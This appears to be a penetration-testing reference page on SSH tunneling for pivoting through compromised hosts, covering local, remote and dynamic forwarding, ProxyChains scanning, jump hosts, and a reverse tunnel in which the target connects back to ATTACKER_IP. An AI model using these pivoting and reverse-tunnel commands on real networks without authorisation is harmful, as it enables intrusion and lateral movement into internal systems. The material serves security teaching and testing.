> ## Documentation Index
> Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
> Use this file to discover all available pages before exploring further.

# SSH Tunneling

> SSH tunneling techniques: local, remote, and dynamic port forwarding for pivoting through compromised hosts.

## Local Port Forward

Access remote service through local port.

```bash theme={"dark"}
ssh -L LOCAL_PORT:TARGET_IP:TARGET_PORT user@PIVOT_HOST
```

### Example — Access Internal Web

```bash theme={"dark"}
ssh -L 8080:10.10.10.5:80 user@pivot
# Access http://127.0.0.1:8080 → reaches 10.10.10.5:80
```

### Example — Access Internal DB

```bash theme={"dark"}
ssh -L 3306:10.10.10.5:3306 user@pivot
# mysql -h 127.0.0.1 -u root
```

***

## Remote Port Forward

Expose local service to remote network.

```bash theme={"dark"}
ssh -R REMOTE_PORT:LOCAL_IP:LOCAL_PORT user@PIVOT_HOST
```

### Example — Expose Attacker Web Server

```bash theme={"dark"}
ssh -R 8888:127.0.0.1:80 user@pivot
# pivot:8888 → reaches attacker's port 80
```

***

## Dynamic Port Forward (SOCKS Proxy)

```bash theme={"dark"}
ssh -D 1080 user@PIVOT_HOST
```

Use with ProxyChains:

```bash theme={"dark"}
# /etc/proxychains4.conf
socks5 127.0.0.1 1080
```

```bash theme={"dark"}
proxychains nmap -sT -p 80,445 INTERNAL_TARGET
proxychains curl http://INTERNAL_TARGET
```

***

## Background Tunnels

```bash theme={"dark"}
ssh -f -N -L 8080:10.10.10.5:80 user@pivot     # Background, no shell
ssh -f -N -D 1080 user@pivot                     # Background SOCKS
```

| Flag | Description           |
| ---- | --------------------- |
| `-f` | Background after auth |
| `-N` | No remote command     |
| `-L` | Local forward         |
| `-R` | Remote forward        |
| `-D` | Dynamic (SOCKS)       |

***

## SSH Config for Pivoting

```
# ~/.ssh/config
Host pivot
    HostName 10.10.10.1
    User user
    IdentityFile ~/.ssh/id_rsa
    DynamicForward 1080

Host internal
    HostName 10.10.10.5
    User admin
    ProxyJump pivot
```

```bash theme={"dark"}
ssh internal                         # Auto-jumps through pivot
```

***

## ProxyJump (SSH Jump Host)

```bash theme={"dark"}
ssh -J user@pivot user@INTERNAL_TARGET
ssh -J user@hop1,user@hop2 user@FINAL_TARGET
```

***

## Reverse SSH Tunnel (From Target)

Target initiates connection back to attacker.

```bash theme={"dark"}
# On target
ssh -R 9999:127.0.0.1:22 attacker@ATTACKER_IP

# On attacker
ssh -p 9999 user@127.0.0.1
```

***

## Kill Tunnel

```bash theme={"dark"}
ps aux | grep ssh
kill PID
```

Or use control socket:

```bash theme={"dark"}
ssh -M -S /tmp/tunnel -f -N -D 1080 user@pivot
ssh -S /tmp/tunnel -O exit user@pivot
```

***

## Quick Reference

| Task           | Command                               |
| -------------- | ------------------------------------- |
| Local forward  | `ssh -L 8080:INTERNAL:80 user@pivot`  |
| Remote forward | `ssh -R 8888:127.0.0.1:80 user@pivot` |
| SOCKS proxy    | `ssh -D 1080 user@pivot`              |
| Jump host      | `ssh -J user@pivot user@internal`     |
| Background     | `ssh -f -N -D 1080 user@pivot`        |
